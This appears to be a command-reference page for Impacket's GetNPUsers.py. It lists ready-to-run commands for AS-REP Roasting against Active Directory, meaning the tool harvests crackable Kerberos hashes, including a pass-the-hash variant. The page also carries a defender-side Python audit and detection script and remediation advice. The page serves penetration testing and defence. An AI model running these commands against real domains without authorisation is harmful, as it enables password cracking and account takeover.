
Linux command

getnpusers.py command

File

After copying a command, replace file names, directories, or parameters as needed.

Common examples

Query domain users

GetNPUsers.py [DOMAIN]/[username]:[password] -request -format hashcat -outputfile [hashes.txt]

Check specific users

GetNPUsers.py [DOMAIN]/ -usersfile [users.txt] -format hashcat -outputfile [hashes.txt] -dc-ip [DC_IP]

Request TGT for a specific user

GetNPUsers.py [DOMAIN]/[username] -no-pass -dc-ip [DC_IP]

Use pass-the-hash

GetNPUsers.py [DOMAIN]/[username] -hashes [LMhash]:[NThash] -request

Output in John format

GetNPUsers.py [DOMAIN]/[username]:[password] -request -format john

Description

GetNPUsers.py is an Impacket tool that identifies Active Directory users with Kerberos pre-authentication disabled and retrieves their AS-REP (Authentication Service Response) encrypted data. This data can be cracked offline to recover user passwords, an attack known as AS-REP Roasting. When pre-authentication is disabled for a user, anyone can request a TGT on their behalf without knowing the password: the domain controller returns an AS-REP whose encrypted part is keyed with the user's password-derived key, so it can be brute-forced offline. The tool can either query all domain users via LDAP (which requires valid domain credentials) or check specific usernames supplied in a file (which requires no credentials, only the usernames).
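As an added defender-side example (not part of the Impacket project and not one of this page's commands), the script below audits the same condition GetNPUsers.py enumerates and flags the TGT requests the tool generates. The account records, userAccountControl values and Security-log lines are constructed samples; the userAccountControl bit values and the meaning of the 4768 fields are Microsoft's documented ones, and the key=value log shape is an assumed simplification of the event XML.

```python
"""
Defender-side audit for the exposure GetNPUsers.py enumerates.

Added example, not part of Impacket. Two checks:
  1. roastable_accounts(): flag enabled accounts whose userAccountControl has
     the DONT_REQ_PREAUTH bit set (what the tool's LDAP query looks for).
  2. asrep_roast_alerts(): flag Security-log 4768 (TGT requested) events whose
     Pre-Authentication Type is 0, i.e. a TGT issued without pre-auth.
All input data is constructed inline so the script runs offline.
"""

# userAccountControl bits (documented values of the AD userAccountControl attribute).
UF_ACCOUNTDISABLE = 0x0002          # account is disabled
UF_NORMAL_ACCOUNT = 0x0200          # ordinary user account
UF_DONT_EXPIRE_PASSWD = 0x10000     # password never expires
UF_DONT_REQUIRE_PREAUTH = 0x400000  # "Do not require Kerberos preauthentication"

# Constructed sample records, shaped like an LDAP export of
# sAMAccountName / userAccountControl (hypothetical accounts).
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "alice", "userAccountControl": UF_NORMAL_ACCOUNT},
    {"sAMAccountName": "svc_backup", "userAccountControl": UF_NORMAL_ACCOUNT | UF_DONT_REQUIRE_PREAUTH},
    {"sAMAccountName": "old_svc", "userAccountControl": UF_NORMAL_ACCOUNT | UF_ACCOUNTDISABLE | UF_DONT_REQUIRE_PREAUTH},
    {"sAMAccountName": "bob", "userAccountControl": UF_NORMAL_ACCOUNT | UF_DONT_EXPIRE_PASSWD},
]


def roastable_accounts(accounts):
    """Return names of enabled accounts that do not require pre-authentication.

    Disabled accounts are skipped: the KDC will not issue them a TGT, so they
    cannot be roasted, although clearing the flag on them is still good hygiene.
    """
    return sorted(
        a["sAMAccountName"]
        for a in accounts
        if a["userAccountControl"] & UF_DONT_REQUIRE_PREAUTH
        and not a["userAccountControl"] & UF_ACCOUNTDISABLE
    )


# Constructed, simplified key=value renderings of Windows Security events.
# Field names follow the event XML (TargetUserName, PreAuthType,
# TicketEncryptionType, IpAddress); 4769 (service ticket) carries no PreAuthType.
SAMPLE_EVENTS = [
    "EventID=4768 TargetUserName=alice PreAuthType=2 TicketEncryptionType=0x12 IpAddress=10.0.0.15",
    "EventID=4768 TargetUserName=svc_backup PreAuthType=0 TicketEncryptionType=0x17 IpAddress=10.0.0.99",
    "EventID=4768 TargetUserName=svc_backup PreAuthType=0 TicketEncryptionType=0x12 IpAddress=10.0.0.15",
    "EventID=4769 TargetUserName=bob ServiceName=cifs/fs01 TicketEncryptionType=0x17 IpAddress=10.0.0.15",
]


def parse_event(line):
    """Split one constructed 'key=value key=value' line into a dict."""
    return dict(kv.split("=", 1) for kv in line.split())


def asrep_roast_alerts(log_lines):
    """Return one alert per 4768 event that was issued without pre-authentication.

    PreAuthType 0 ("Logon without Pre-Authentication") means the KDC handed out
    a TGT with no pre-auth exchange, which is what GetNPUsers.py -request
    produces. RC4 (0x17) is rated higher because that AS-REP is the cheapest
    to crack offline.
    """
    alerts = []
    for line in log_lines:
        ev = parse_event(line)
        if ev.get("EventID") != "4768" or ev.get("PreAuthType") != "0":
            continue  # not a TGT request, or pre-auth was performed
        etype = int(ev["TicketEncryptionType"], 16)
        alerts.append({
            "user": ev["TargetUserName"],
            "source": ev["IpAddress"],
            "etype": etype,
            "severity": "high" if etype == 0x17 else "medium",
        })
    return alerts


if __name__ == "__main__":
    print("Accounts with pre-auth disabled:", roastable_accounts(SAMPLE_ACCOUNTS))
    for alert in asrep_roast_alerts(SAMPLE_EVENTS):
        print("ALERT", alert)
```

Remediation for anything roastable_accounts() reports is to clear the "Do not require Kerberos preauthentication" option on the account (the flag is almost never needed by modern Kerberos clients) and to rotate the account to a long random password in case its AS-REP has already been captured. For the log side, several 4768 events with PreAuthType 0 from one source address against different users within a short window is the pattern an enumeration run leaves behind.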

Parameters

-request
Request a TGT for every user found with pre-authentication disabled, producing crackable AS-REP hashes.
-format [FORMAT]
Output format for the hashes: hashcat or john.
-outputfile [FILE]
Write the AS-REP hashes to the specified file.
-usersfile [FILE]
File containing a list of usernames to check (one per line).
-dc-ip [IP]
IP address of the domain controller.
-no-pass
Do not prompt for a password (used with -k, or when checking usernames without credentials).
-hashes [LMHASH]:[NTHASH]
Authenticate with an NTLM hash (pass-the-hash) instead of a password.
-k
Use Kerberos authentication with the credentials from a ccache file (set KRB5CCNAME).
-debug
Enable debug output.

FAQ

What is the getnpusers.py command used for?

See the description above: it enumerates Active Directory accounts with Kerberos pre-authentication disabled and retrieves their AS-REP encrypted data, which can then be cracked offline (AS-REP Roasting).

How do I run a basic getnpusers.py example?

Run `GetNPUsers.py [DOMAIN]/[username]:[password] -request -format hashcat -outputfile [hashes.txt]` in a terminal, then adjust file names, paths, flags, or remote targets for your system.

What does -request do in getnpusers.py?

Request TGT for users found with pre-auth disabled.